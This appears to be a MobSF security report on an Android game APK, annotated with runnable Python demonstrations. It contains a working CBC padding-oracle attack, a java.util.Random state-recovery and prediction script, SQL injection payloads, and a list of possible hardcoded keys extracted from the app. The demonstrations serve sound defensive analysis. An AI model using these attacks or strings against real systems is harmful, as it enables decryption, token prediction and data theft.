Security Score: 49/100
Risk Rating scale: A / B / C / F
Privacy Risk: 4 user/device trackers
Findings by severity: High 3, Medium 16, Info 1, Secure 2, Hotspot 0
High: The application is vulnerable to the Janus vulnerability
The application is signed with the v1 (JAR) signature scheme. If it is signed only with v1, it is vulnerable to Janus (CVE-2017-13156) on Android 5.0-8.0. Applications signed with both v1 and v2/v3 remain vulnerable when running on Android 5.0-7.0. Janus works because v1 verification covers only the ZIP entries: a DEX file can be prepended to the APK without invalidating the signature, and the runtime executes the injected DEX while the package still passes as legitimately signed. Re-sign with apksigner using v2 and v3 in addition to v1, and confirm with `apksigner verify --verbose --print-certs app.apk`, which lists the schemes actually present.
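A quick structural check that reproduces the v1-only classification without the Android SDK, added here as an example (it is not part of the MobSF report or the analysed app). It looks for META-INF signature files (v1) and for the APK Signing Block that v2/v3 signatures live in, located immediately before the ZIP central directory and terminated by the magic `APK Sig Block 42`. The two sample APKs are constructed inside the script; the block check proves presence only, not validity, so `apksigner verify` remains the authoritative answer.

```python
"""Added example (not part of the MobSF report): classify an APK's signing schemes
to confirm a Janus-style v1-only finding. Standard library only; the sample APKs
are constructed in build_sample_apk() and are not the analysed app."""
import io
import struct
import zipfile

APK_SIG_BLOCK_MAGIC = b"APK Sig Block 42"   # trailer magic of the APK Signing Block (v2/v3)
EOCD_SIGNATURE = b"\x50\x4b\x05\x06"         # ZIP End of Central Directory record
V2_BLOCK_ID = 0x7109871A                     # ID of the v2 signature pair inside the block


def _eocd_and_cd_offset(data: bytes) -> tuple:
    """Return (offset of the EOCD record, offset of the central directory)."""
    eocd = data.rfind(EOCD_SIGNATURE, max(0, len(data) - 22 - 65535))
    if eocd < 0:
        raise ValueError("not a ZIP/APK: EOCD record not found")
    return eocd, struct.unpack_from("<I", data, eocd + 16)[0]


def has_v1_signature(data: bytes) -> bool:
    """v1 (JAR) signing leaves a signature block file under META-INF/."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return any(n.startswith("META-INF/") and n.upper().endswith((".RSA", ".DSA", ".EC"))
                   for n in zf.namelist())


def has_apk_signing_block(data: bytes) -> bool:
    """v2/v3 signatures live in an APK Signing Block right before the central directory:
    uint64 size | id-value pairs | uint64 size (same value) | 16-byte magic."""
    _, cd = _eocd_and_cd_offset(data)
    if cd < 24 or data[cd - 16:cd] != APK_SIG_BLOCK_MAGIC:
        return False
    size_of_block = struct.unpack_from("<Q", data, cd - 24)[0]
    start = cd - 8 - size_of_block                 # the leading size field excludes itself
    return start >= 0 and struct.unpack_from("<Q", data, start)[0] == size_of_block


def janus_exposure(data: bytes) -> dict:
    """v1 present and no signing block is the Janus precondition flagged by MobSF."""
    v1, v2plus = has_v1_signature(data), has_apk_signing_block(data)
    return {"v1": v1, "v2_or_v3": v2plus, "janus_exposed": v1 and not v2plus}


def build_sample_apk(v1: bool, v2_block: bool) -> bytes:
    """Constructed test fixture: a tiny APK-shaped ZIP, optionally with v1 signature
    files and/or a dummy (unsigned) APK Signing Block inserted before the central directory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("AndroidManifest.xml", b"<manifest/>")
        zf.writestr("classes.dex", b"dex\n035\x00" + b"\x00" * 8)
        if v1:
            zf.writestr("META-INF/MANIFEST.MF", b"Manifest-Version: 1.0\n")
            zf.writestr("META-INF/CERT.SF", b"Signature-Version: 1.0\n")
            zf.writestr("META-INF/CERT.RSA", b"\x30\x82\x00\x00")   # placeholder PKCS#7 bytes
    data = buf.getvalue()
    if not v2_block:
        return data
    eocd, cd = _eocd_and_cd_offset(data)
    pair = struct.pack("<QI", 4 + 4, V2_BLOCK_ID) + b"\x00" * 4     # one dummy pair: len | id | value
    size_of_block = len(pair) + 8 + 16
    block = (struct.pack("<Q", size_of_block) + pair
             + struct.pack("<Q", size_of_block) + APK_SIG_BLOCK_MAGIC)
    # insert the block and shift the EOCD's central-directory offset by its length
    patched_eocd = data[eocd:eocd + 16] + struct.pack("<I", cd + len(block)) + data[eocd + 20:]
    return data[:cd] + block + data[cd:eocd] + patched_eocd
```

Run `janus_exposure(open("app.apk", "rb").read())` against a real APK; a `{"v1": True, "v2_or_v3": False, ...}` result is exactly the state this finding describes.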
High: Debug configuration enabled. Production builds must not be debuggable
Debug configuration enabled. Production builds must not be debuggable. The flagged BuildConfig.java lines are the generated DEBUG constant of a debug build variant; the flag the runtime honours is android:debuggable in the manifest, which can be checked with `aapt dump xmltree app.apk AndroidManifest.xml`. A debuggable app lets anyone with adb access attach a debugger and use `run-as` to read its private data directory. https://github.com/OWASP/owasp-mstg/blob/master/Document/0x04c-Tampering-and-Reverse-Engineering.md#debugging-and-tracing Files: com/invictus/impossiball/BuildConfig.java, line(s) 3,4 com/prime31/InAppBilling/BuildConfig.java, line(s) 3,4
High: The application uses the CBC encryption mode with PKCS5/PKCS7 padding. This configuration is vulnerable to padding oracle attacks.
The application uses the CBC encryption mode with PKCS5/PKCS7 padding. This configuration is vulnerable to padding oracle attacks. The attack needs an attacker who can submit modified ciphertext to the decrypting code and tell a padding failure (BadPaddingException) apart from any other outcome, whether by error message, status or timing; whether AESUtil.java and CipherUtil.java expose such a path depends on where their ciphertext comes from and how failures surface. The fix is an authenticated mode (AES/GCM/NoPadding) or an HMAC over IV and ciphertext that is verified before any decryption is attempted. https://github.com/OWASP/owasp-mstg/blob/master/Document/0x04g-Testing-Cryptography.md#identifying-insecure-andor-deprecated-cryptographic-algorithms-mstg-crypto-4 Files: com/wandoujia/ads/sdk/legacy/util/AESUtil.java, line(s) 22 com/wandoujia/ads/sdk/legacy/util/CipherUtil.java, line(s) 18
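The attack behind this finding, as an added example that is not code from the report or the app: CBC decryption with PKCS#7 padding, a decrypt routine that raises on bad padding the way `Cipher.doFinal()` does, and an attacker who recovers the plaintext using only yes/no answers from that routine. A 4-round Feistel network built on SHA-256 stands in for AES so the script has no dependencies; the attack never touches the cipher, only the oracle, so swapping in real AES changes nothing. Key, IV and plaintext are constructed for the demo.

```python
"""Added example (not part of the MobSF report): why CBC + PKCS#5/#7 padding with a
leaky decrypt path is exploitable. A Feistel network stands in for AES so the file has
no dependencies; the attack only uses the oracle, never the cipher or the key."""
import hashlib

BLOCK = 16

def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def _round(key: bytes, half: bytes, r: int) -> bytes:
    return hashlib.sha256(key + bytes([r]) + half).digest()[:8]

def block_encrypt(key: bytes, block: bytes) -> bytes:
    """4-round Feistel PRP on 16-byte blocks (AES stand-in, constructed for the demo)."""
    left, right = block[:8], block[8:]
    for r in range(4):
        left, right = right, _xor(left, _round(key, right, r))
    return left + right

def block_decrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for r in reversed(range(4)):
        left, right = _xor(right, _round(key, left, r)), left
    return left + right

def pkcs7_pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def pkcs7_unpad(data: bytes) -> bytes:
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")      # the leak: javax.crypto.BadPaddingException
    return data[:-n]

def encrypt_message(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """CBC with PKCS#7 padding, i.e. what AES/CBC/PKCS5Padding does on 16-byte blocks."""
    padded, out, prev = pkcs7_pad(plaintext), b"", iv
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, _xor(padded[i:i + BLOCK], prev))
        out += prev
    return out

def decrypt_message(key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    """Mirrors Cipher.doFinal(): decrypt every block, then raise on invalid padding."""
    out, prev = b"", iv
    for i in range(0, len(ciphertext), BLOCK):
        block = ciphertext[i:i + BLOCK]
        out += _xor(block_decrypt(key, block), prev)
        prev = block
    return pkcs7_unpad(out)

def make_padding_oracle(key: bytes):
    """Any code path that lets a caller distinguish 'bad padding' from 'ok' is this."""
    def oracle(prev_block: bytes, block: bytes) -> bool:
        try:
            decrypt_message(key, prev_block, block)
            return True
        except ValueError:
            return False
    return oracle

def recover_block(oracle, prev_block: bytes, target: bytes) -> bytes:
    """Recover one plaintext block with at most 16*256 oracle queries and no key material."""
    inter = bytearray(BLOCK)                 # block_decrypt(target), learned byte by byte
    for pos in range(BLOCK - 1, -1, -1):
        pad = BLOCK - pos
        for guess in range(256):
            forged = bytearray(BLOCK)
            forged[pos] = guess
            for j in range(pos + 1, BLOCK):  # force already-known bytes to the pad value
                forged[j] = inter[j] ^ pad
            if not oracle(bytes(forged), target):
                continue
            if pos == BLOCK - 1:             # 0x02 0x02 can masquerade as valid: disturb byte 14
                forged[pos - 1] ^= 0xFF
                if not oracle(bytes(forged), target):
                    continue
            inter[pos] = guess ^ pad
            break
        else:
            raise RuntimeError("oracle never accepted: not a padding oracle")
    return _xor(bytes(inter), prev_block)

def recover_plaintext(oracle, iv: bytes, ciphertext: bytes) -> bytes:
    blocks = [iv] + [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    padded = b"".join(recover_block(oracle, blocks[i - 1], blocks[i]) for i in range(1, len(blocks)))
    return pkcs7_unpad(padded)

def demo() -> bytes:
    key, iv = b"constructed-key!", bytes(range(BLOCK))   # constructed; never seen by the attacker
    secret = b"user=alice;role=admin"
    return recover_plaintext(make_padding_oracle(key), iv, encrypt_message(key, iv, secret))
```

`demo()` returns the original plaintext having seen only the IV, the ciphertext and the oracle's answers. With an authenticated mode the oracle disappears: a tampered ciphertext fails the tag check before any padding is inspected, so every forged query gets the same answer.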
Medium: Application data can be backed up and may be leaked
The [android:allowBackup] flag is missing. This flag [android:allowBackup] should be set to false. By default it is set to true, which allows anyone to back up the application's data via adb: a user who has enabled USB debugging can copy the app's private data off the device with `adb backup`.
Medium: Activity (com.wandoujia.standalone_sdk.StandAloneSdkActivity) is not protected.
An intent-filter exists. The Activity is shared with other apps on the device, which leaves it accessible to any other application on the device. The presence of the intent-filter indicates that the Activity is explicitly exported.
Medium: Broadcast Receiver (com.wandoujia.standalone_sdk.BootReceiverWrapper) is not protected.
An intent-filter exists. The Broadcast Receiver is shared with other apps on the device, which leaves it accessible to any other application on the device. The presence of the intent-filter indicates that the Broadcast Receiver is explicitly exported. If, as its name suggests, it handles the boot-completed broadcast it has to stay exported for the system to deliver that intent; the mitigation is then to check the received action and ignore everything else, so that an arbitrary app cannot trigger its logic with a crafted broadcast.
Medium: Service (com.ehoo.post.EhooPostService) is not protected.
An intent-filter exists. The Service is shared with other apps on the device, which leaves it accessible to any other application on the device. The presence of the intent-filter indicates that the Service is explicitly exported. Any app can start or bind to it and supply arbitrary extras. If it is not meant for other apps, set android:exported="false"; if it is, gate it with android:permission using a signature-level permission and validate every extra it reads.
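The three component findings above follow one rule, applied here in an added example (not the report's or the app's code) so the result can be re-derived from a decompiled AndroidManifest.xml: android:exported wins when present; otherwise a component with an intent-filter is exported and one without is not (the default before API 31), and a provider without an explicit attribute is not exported when minSdkVersion is 17 or higher. Only the component names in the constructed manifest come from the report; its intent-filter actions are assumptions made for the test.

```python
"""Added example (not part of the MobSF report): list manifest components that other
apps can reach with no permission gate. The manifest below is constructed for the test."""
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
COMPONENT_TAGS = ("activity", "activity-alias", "service", "receiver", "provider")


def unprotected_components(manifest_xml: str, min_sdk: int = 21) -> list:
    """Return (tag, name, [actions]) for every exported component without android:permission.
    Exported-ness: explicit android:exported if present; else intent-filter => exported
    (pre-API-31 default); a provider with no attribute is not exported when min_sdk >= 17."""
    application = ET.fromstring(manifest_xml).find("application")
    found = []
    for comp in application:
        if comp.tag not in COMPONENT_TAGS:
            continue
        exported = comp.get(ANDROID_NS + "exported")
        if exported is None:
            if comp.tag == "provider":
                is_exported = min_sdk < 17
            else:
                is_exported = comp.find("intent-filter") is not None
        else:
            is_exported = exported == "true"
        if is_exported and comp.get(ANDROID_NS + "permission") is None:
            actions = [a.get(ANDROID_NS + "name") for a in comp.iter("action")]
            found.append((comp.tag, comp.get(ANDROID_NS + "name"), actions))
    return found


# Constructed manifest: component names from the report, everything else assumed.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.app">
  <application>
    <activity android:name="com.wandoujia.standalone_sdk.StandAloneSdkActivity">
      <intent-filter><action android:name="android.intent.action.VIEW"/></intent-filter>
    </activity>
    <receiver android:name="com.wandoujia.standalone_sdk.BootReceiverWrapper">
      <intent-filter><action android:name="android.intent.action.BOOT_COMPLETED"/></intent-filter>
    </receiver>
    <service android:name="com.ehoo.post.EhooPostService">
      <intent-filter><action android:name="com.example.action.POST"/></intent-filter>
    </service>
    <service android:name="com.example.InternalService" android:exported="false"/>
    <service android:name="com.example.GuardedService" android:exported="true"
             android:permission="com.example.permission.USE_SERVICE"/>
    <activity android:name="com.example.MainActivity"/>
  </application>
</manifest>"""
```

The last three components in the sample show the two fixes in manifest form (exported="false", or exported="true" plus a permission) and the no-filter default; none of them is reported.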
Medium: MD5 is a weak hash known to have hash collisions
MD5 is a weak hash known to have hash collisions. Whether a hit matters depends on use: MD5 as a cache key or non-security identifier is harmless, MD5 as an integrity check for downloaded updates (the names MD5Checksum.java and standalone_api/upgrade/a.java suggest this) is not, since collision attacks on MD5 are practical and a checksum fetched over the same unauthenticated channel as the file protects nothing. Verify downloads with a signature, or at minimum a SHA-256 digest delivered over an authenticated channel. https://github.com/OWASP/owasp-mstg/blob/master/Document/0x04g-Testing-Cryptography.md#identifying-insecure-andor-deprecated-cryptographic-algorithms-mstg-crypto-4 Files: com/tencent/mm/a/b.java, line(s) 9 com/wandoujia/ads/sdk/legacy/util/g.java, line(s) 17 com/wandoujia/standalone_api/upgrade/a.java, line(s) 43 utils/MD5Checksum.java, line(s) 14,28 utils/Utils.java, line(s) 199
Medium: The application can read/write external storage. Any app can read data written to external storage
The application can read/write external storage. Any app can read data written to external storage: before scoped storage (Android 10) any app holding READ_EXTERNAL_STORAGE can read, and with WRITE_EXTERNAL_STORAGE replace, such files. If the download and upgrade code flagged here (SilentUpdate.java, DownloadService.java, DownLoadUtil.java, InMemoryAppDownloadManager.java) stages APKs or updates on external storage, another app can tamper with them between download and use; verify a signature over the file before installing it, rather than the MD5 flagged above. https://github.com/OWASP/owasp-mstg/blob/master/Document/0x05d-Testing-Data-Storage.md#external-storage Files: com/prime31/EtceteraPlugin.java, line(s) 804,805,839,840 com/prime31/EtceteraProxyActivity.java, line(s) 81,82 com/prime31/PlayGameServicesPlugin.java, line(s) 513,528 com/tencent/a/a/a/a/b.java, line(s) 17,29,31 com/wandoujia/ads/sdk/download/InMemoryAppDownloadManager.java, line(s) 93,101 com/wandoujia/ads/sdk/f.java, line(s) 51,139,141 com/wandoujia/ads/sdk/legacy/util/UDIDUtil.java, line(s) 68 com/wandoujia/ads/sdk/legacy/util/f.java, line(s) 106,107 com/wandoujia/ads/sdk/legacy/util/m.java, line(s) 46 com/wandoujia/standalone_api/a/a.java, line(s) 29,30 com/wandoujia/standalone_api/upgrade/SilentUpdate.java, line(s) 212,213 service/DownloadService.java, line(s) 43 utils/DownLoadUtil.java, line(s) 13
Medium: The application uses an insecure random number generator
The application uses an insecure random number generator. java.util.Random is a 48-bit linear congruential generator whose internal state can be recovered from two consecutive outputs, after which every past and future value is predictable. Use java.security.SecureRandom for anything security-relevant (keys, IVs, nonces, session tokens). The hit in AESUtil.java matters most if that instance feeds key or IV generation. https://github.com/OWASP/owasp-mstg/blob/master/Document/0x04g-Testing-Cryptography.md#weak-random-number-generators Files: com/wandoujia/ads/sdk/legacy/util/AESUtil.java, line(s) 10 org/springframework/http/converter/FormHttpMessageConverter.java, line(s) 15 utils/PhoneUtils.java, line(s) 18 utils/Utils.java, line(s) 32
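To show why this is more than a style finding, an added example (not the report's or the app's code) re-implements java.util.Random's generator (same 48-bit state, multiplier 0x5DEECE66D, addend 0xB and seed scrambling) and recovers the state from a few observed nextInt() values. nextInt() exposes the top 32 of the 48 state bits, so only 16 bits need brute forcing; the seed used below is constructed and is never shown to the recovery code.

```python
"""Added example (not part of the MobSF report): predict java.util.Random output from
observed values. The seed is constructed for the demo; the attacker code never sees it."""
MULT, ADD, MASK = 0x5DEECE66D, 0xB, (1 << 48) - 1


def _to_signed32(v: int) -> int:
    """Java int semantics for the value returned by nextInt()."""
    return v - (1 << 32) if v >= (1 << 31) else v


class JavaRandom:
    """Re-implementation of java.util.Random's LCG: setSeed() scrambles with the multiplier,
    next(32) advances the state and returns its top 32 bits."""

    def __init__(self, seed: int):
        self.state = (seed ^ MULT) & MASK

    def next_int(self) -> int:
        self.state = (self.state * MULT + ADD) & MASK
        return _to_signed32(self.state >> 16)


def recover_state(observed: list) -> int:
    """Brute-force the 16 state bits nextInt() hides. Two consecutive outputs are enough in
    practice; a third makes a false candidate negligible. Returns the state after the last
    observed value, ready for predict_next_int()."""
    if len(observed) < 2:
        raise ValueError("need at least two consecutive outputs")
    hi = (observed[0] & 0xFFFFFFFF) << 16
    for low in range(1 << 16):
        state = hi | low
        for expected in observed[1:]:
            state = (state * MULT + ADD) & MASK
            if state >> 16 != expected & 0xFFFFFFFF:
                break
        else:
            return state
    raise ValueError("not consecutive java.util.Random.nextInt() outputs")


def predict_next_int(state: int) -> tuple:
    """Advance a recovered state once; returns (new_state, predicted nextInt())."""
    state = (state * MULT + ADD) & MASK
    return state, _to_signed32(state >> 16)


def demo() -> dict:
    rng = JavaRandom(seed=0x5EED)                      # constructed; unknown to the attacker
    observed = [rng.next_int() for _ in range(3)]      # e.g. three tokens seen on the wire
    _, predicted = predict_next_int(recover_state(observed))
    return {"observed": observed, "predicted": predicted, "actual": rng.next_int()}
```

The loop is 65,536 iterations, well under a second in Python; an attacker who sees two or three "random" identifiers produced by one Random instance can therefore compute the next one. SecureRandom has no such structure to recover.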
Medium: SHA-1 is a weak hash known to have hash collisions
SHA-1 is a weak hash known to have hash collisions. Read the single hit in context: SHA-1 used to display a certificate fingerprint is not the same risk as SHA-1 used to verify integrity or signatures. https://github.com/OWASP/owasp-mstg/blob/master/Document/0x04g-Testing-Cryptography.md#identifying-insecure-andor-deprecated-cryptographic-algorithms-mstg-crypto-4 Files: com/prime31/GameHelperUtils.java, line(s) 125
Medium: Files may contain hardcoded sensitive information such as usernames, passwords, keys, etc.
Files may contain hardcoded sensitive information such as usernames, passwords, keys, etc. Anything shipped in the APK is readable by anyone who decompiles it, so a hardcoded value can only ever be an identifier, never a secret. https://github.com/OWASP/owasp-mstg/blob/master/Document/0x05d-Testing-Data-Storage.md#checking-memory-for-sensitive-data-mstg-storage-10 Files: com/invictus/impossiball/Const.java, line(s) 6 com/invictus/impossiball/MainActivity.java, line(s) 25,52 com/prime31/EtceteraPlugin.java, line(s) 83,85,84 utils/Constant.java, line(s) 5
Medium: Possible cross-origin issue. Enabling file access from URLs in a WebView can leak sensitive information from the file system
Possible cross-origin issue. Enabling file access from URLs in a WebView (setAllowFileAccessFromFileURLs / setAllowUniversalAccessFromFileURLs set to true) lets JavaScript running in a file:// page read other local files and, with universal access, send their contents to any origin. Both settings default to false from API 16 on and should stay that way; disable setAllowFileAccess as well unless the WebView genuinely has to load local files. https://github.com/OWASP/owasp-mstg/blob/master/Document/0x05h-Testing-Platform-Interaction.md#static-analysis-6 Files: adview/WebViewActivity.java, line(s) 77,70 com/prime31/WebViewActivity.java, line(s) 79,97,75
Medium: The application creates temporary files. Sensitive information should never be written to temporary files
The application creates temporary files. Sensitive information should never be written to temporary files. Files: com/prime31/EtceteraProxyActivity.java, line(s) 72
Medium: Insecure WebView implementation. Possible WebView arbitrary code execution
Insecure WebView implementation. Possible WebView arbitrary code execution: JavaScript is enabled and a Java object is exposed through addJavascriptInterface. On targetSdkVersion below 17 that interface allows reflection-based code execution from any page the WebView renders (CVE-2012-6636); on API 17 and above only methods annotated with @JavascriptInterface are reachable, so review what those methods can do. Exploitability depends on whether the WebView loads attacker-influenced content, which for a class named adview/WebViewActivity.java (ad creatives) deserves a close look. https://github.com/OWASP/owasp-mstg/blob/master/Document/0x05h-Testing-Platform-Interaction.md#testing-javascript-execution-in-webviews-mstg-platform-5 Files: adview/WebViewActivity.java, line(s) 64,70
Medium: IP address disclosure
Hardcoded IP addresses were found. If the ones in SilentUpdate.java address an update endpoint, confirm that the connection uses TLS with certificate validation; a raw IP literal is a sign that transport security may be bypassed or misconfigured. Files: com/wandoujia/standalone_api/upgrade/SilentUpdate.java, line(s) 97,183
Medium: The application uses an SQLite database and executes raw SQL queries. Untrusted user input in raw SQL queries can lead to SQL injection. Sensitive information should also be encrypted before being written to the database
The application uses an SQLite database and executes raw SQL queries. Untrusted user input in raw SQL queries can lead to SQL injection. Sensitive information should also be encrypted before being written to the database. Raw SQL is only a problem when a value from outside the app (an Intent extra, a URL parameter, a downloaded manifest) is concatenated into the statement; use the selectionArgs parameter of rawQuery/query so the value is bound rather than parsed. https://github.com/OWASP/owasp-mstg/blob/master/Document/0x04h-Testing-Code-Quality.md#injection-flaws-mstg-arch-2-and-mstg-platform-2 Files: com/wandoujia/ads/sdk/d.java, line(s) 4,5,25,29,37
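The vulnerable and the fixed query side by side, as an added example that is not the app's code: Python's sqlite3 module speaks the same SQLite dialect Android uses, so the concatenated statement behaves exactly as `db.rawQuery("... WHERE pkg = '" + pkg + "'", null)` would, and the parameterised one as `db.rawQuery("... WHERE pkg = ?", new String[]{pkg})`. The table and its rows are constructed for the demo.

```python
"""Added example (not part of the MobSF report): string-built versus parameterised
SQLite queries. The table and rows are constructed here, not taken from the app."""
import sqlite3


def open_sample_db() -> sqlite3.Connection:
    """Constructed in-memory table shaped like a download manager's bookkeeping."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE downloads (pkg TEXT, path TEXT, token TEXT)")
    conn.executemany("INSERT INTO downloads VALUES (?, ?, ?)", [
        ("com.example.game", "/sdcard/Download/game.apk", "tok-1111"),
        ("com.example.tool", "/sdcard/Download/tool.apk", "tok-2222"),
    ])
    return conn


def lookup_concatenated(conn: sqlite3.Connection, pkg: str) -> list:
    """Vulnerable: equivalent to rawQuery("SELECT ... WHERE pkg = '" + pkg + "'", null)."""
    return conn.execute(f"SELECT pkg, token FROM downloads WHERE pkg = '{pkg}'").fetchall()


def lookup_parameterised(conn: sqlite3.Connection, pkg: str) -> list:
    """Fixed: equivalent to rawQuery("SELECT ... WHERE pkg = ?", new String[]{pkg})."""
    return conn.execute("SELECT pkg, token FROM downloads WHERE pkg = ?", (pkg,)).fetchall()


def demo() -> dict:
    conn = open_sample_db()
    bypass = "nope' OR '1'='1"                                              # WHERE becomes a tautology
    union = "nope' UNION SELECT path, token FROM downloads WHERE '1'='1"    # reads other columns
    return {
        "bypass_raw": lookup_concatenated(conn, bypass),
        "union_raw": lookup_concatenated(conn, union),
        "bypass_param": lookup_parameterised(conn, bypass),
        "union_param": lookup_parameterised(conn, union),
    }
```

With the concatenated query the tautology returns every row and the UNION payload pulls the `path` column the caller never asked for; the bound version returns nothing for either payload because the quote characters are data, not syntax.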
Medium: The application contains privacy trackers
This application contains 4 privacy trackers (the count reported under Privacy Risk above). Trackers can track the device or the user and are a privacy concern for end users.
Medium: This app may contain hardcoded secrets
The following possible secrets were identified in the application. Ensure that none of them is a secret or private information: "chartboost_unity_app_id" : "4f7b433509b6025804000002" 0627f71ad446f8ec3f7be42ab1a92c73 6X8Y4XdM2Vhvn0KfzcEatGnWaNU= 961453575460764ca5bc4a3ebc989c44 1e05e0e27b804482b24a6132d81f27a2 b543e392e2f8470d8a9342ec08dc02a5 fe9285eacf37c951e1f8d54666721835 qSX538Vb4hDkQ2sFtrbANWQTkCjzckKa 07a25f16f6e4437aba3c705a61b84534 3C1A0B7D67EAAACB9BCEAC7309F6A739 071e0c8e08802e19c807b1d579804c86
Info: The application logs information. Sensitive information must never be logged
The application logs information. Sensitive information must never be logged: logcat output is readable by other apps with READ_LOGS on old releases and by anyone with adb access on all of them, and log lines end up in bug reports. https://github.com/OWASP/owasp-mstg/blob/master/Document/0x05d-Testing-Data-Storage.md#logs Files: adview/RewardVideoActivity.java, line(s) 139,146,153 com/invictus/impossiball/GameSdkApplication.java, line(s) 20,22 com/invictus/impossiball/MainActivity.java, line(s) 59,62,70,76,95,179,180,181,202,211,305,327,330,333,338,350,362,374,386,238,243,248,254,264,269,274,281 com/jayway/jsonpath/JsonModel.java, line(s) 139 com/prime31/ActivityProxyObjectHelper.java, line(s) 40,50,38,48 com/prime31/AlarmManagerReceiver.java, line(s) 115,27,30,34,64,66,69,75,77,79,82,87,90,97,118,127,131,140 com/prime31/AuthenticationProxyActivity.java, line(s) 25,39,46,52,59,63,73 com/prime31/ContactFetcher.java, line(s) 19 com/prime31/EtceteraPlugin.java, line(s) 239,245,254,262,497,499,691,704,730,756,105,152,177,204,431,448,450,462,509,514,519,531,543,546,554,567,655,678,681,708,711,744,776,786,793,815,826,873,891,914,923,932,977,990,1002,1014,1048,1053,1055,1058,1153,1195,1201,1207,1215,1243,475,476 com/prime31/EtceteraPluginBase.java, line(s) 49,109,36,38,40,54,81,84,87,92 com/prime31/EtceteraProxyActivity.java, line(s) 84,180,110,133,39,58,74,111,124,143,146,150,159,162,165,167,182,186,191,196,200,215,219,224,247,253,88 com/prime31/GameHelper.java, line(s) 615,492,564,580,624,515,184,218,228,259,266,280,401,524,620 com/prime31/GameHelperUtils.java, line(s) 75,76,77,78,79,80,81,82,83,84,85,87,90,91,92,93,94,95,96,97,98,99,100,101,160 com/prime31/GoogleIABPlugin.java, line(s) 180,54,87,101,109,130,134,153,161,176,191,226,245,105,114,157 com/prime31/GoogleIABPluginBase.java, line(s) 49,97,36,38,40,54,69,72,75,80,109,124 com/prime31/GoogleIABProxyActivity.java, line(s) 53,34,46,17,25,31,32 com/prime31/IABConstants.java, line(s) 12,18,24,37 com/prime31/ImageUtils.java, line(s) 31,33,37,40,53 com/prime31/P31VideoPlayerActivity.java, line(s) 239,249,254,260,132,165,225,57,61,84,92,102,104,113,141,145,200,213,215,269,223 com/prime31/PlayGameServicesPlugin.java, line(s) 258,300,89,110,137,160,317,322,338,341,343,345,353,357,363,365,438,454,474,494,501,509,514,519,524,529,534,546,608,652,768,919,947,989,999,597,634 com/prime31/PlayGameServicesPluginBase.java, line(s) 67,161,54,56,58,72,87,90,93,98,110,113,116,121,133,136,139,144,172 com/prime31/RealtimeMultiplayer.java, line(s) 136,77,212,294,298,309,327,331,342,51,54,57,60,63,66,69,91,108,120,125,132,145,152,160,243,245,279,303,319,336,347,352,358,364,371,377,384,401,408,413,418,426,434,442,450,458,466,472,478 com/prime31/SamsungCameraHack.java, line(s) 17,25,32,37,39,44,46,50,54 com/prime31/TurnBasedMultiplayer.java, line(s) 34,54,72,77,78,79,94,189,198,203,215,225,229,307,321,335,357,379,438 com/prime31/UnityPlayerActivity.java, line(s) 19 com/prime31/UnityPlayerNativeActivity.java, line(s) 19 com/prime31/WebViewActivity.java, line(s) 145,39,89,150,163 com/prime31/util/IabHelper.java, line(s) 711,108,198,588,650,715 com/prime31/util/Inventory.java, line(s) 28,41,53 com/prime31/util/Security.java, line(s) 23,27,40,45,56,61,64,67,70 com/tencent/a/a/a/a/b.java, line(s) 28,36 com/tencent/a/a/a/a/c.java, line(s) 31,45 com/tencent/a/a/a/a/d.java, line(s) 22,31 com/tencent/a/a/a/a/e.java, line(s) 21,30 com/tencent/a/a/a/a/h.java, line(s) 14,40,50,57,43 com/wandoujia/ads/sdk/d.java, line(s) 36 com/wandoujia/ads/sdk/download/AppDownloadService.java, line(s) 52,70,80,82,87,90,72 com/wandoujia/ads/sdk/download/InMemoryAppDownloadManager.java, line(s) 62,136,147,200 com/wandoujia/ads/sdk/download/a.java, line(s) 41,44 com/wandoujia/ads/sdk/f.java, line(s) 154,77 com/wandoujia/ads/sdk/g.java, line(s) 13 com/wandoujia/ads/sdk/initsteps/f.java, line(s) 37,47,53,60,61,62,74 com/wandoujia/ads/sdk/legacy/util/f.java, line(s) 144,188,193,200,323,329 com/wandoujia/ads/sdk/legacy/util/m.java, line(s) 40 com/wandoujia/ads/sdk/ui/BannerView.java, line(s) 285 com/wandoujia/ads/sdk/utils/n.java, line(s) 49 com/wandoujia/pluginframework/PluginFrameworkInitor.java, line(s) 97,35,75 com/wandoujia/pluginframework/PluginManager.java, line(s) 50 com/wandoujia/pluginframework/a/b.java, line(s) 32,120 com/wandoujia/pluginframework/a/e.java, line(s) 98 com/wandoujia/standalone_api/b.java, line(s) 17,30 org/fmod/FMODAudioDevice.java, line(s) 144 org/fmod/a.java, line(s) 83 org/springframework/http/client/support/HttpAccessor.java, line(s) 38,37 org/springframework/web/client/HttpMessageConverterExtractor.java, line(s) 32,39,31,38 org/springframework/web/client/RestTemplate.java, line(s) 318,359,411,413,316,325,358,409,327 service/DownloadService.java, line(s) 97,105 utils/ClickUtils.java, line(s) 70 utils/DownLoadUtil.java, line(s) 70 utils/DspReqestJson.java, line(s) 28,34 utils/HttpUtil.java, line(s) 44,70,76,133 utils/Loger.java, line(s) 7,15,11,19,23 utils/Player.java, line(s) 94,204,209 utils/Utils.java, line(s) 90,108
Secure: This application uses SSL pinning to detect or prevent MITM attacks on its secure communication channels
This application uses SSL pinning to detect or prevent MITM attacks on its secure communication channels. The single hit is in an ad SDK class (com/wandoujia/ads/sdk/f.java), so it says nothing about whether the app's own traffic is pinned; confirm with an intercepting proxy which connections actually fail under a user-installed CA. https://github.com/OWASP/owasp-mstg/blob/master/Document/0x05g-Testing-Network-Communication.md#testing-custom-certificate-stores-and-certificate-pinning-mstg-network-4 Files: com/wandoujia/ads/sdk/f.java, line(s) 114
Secure: This application may have root detection capabilities
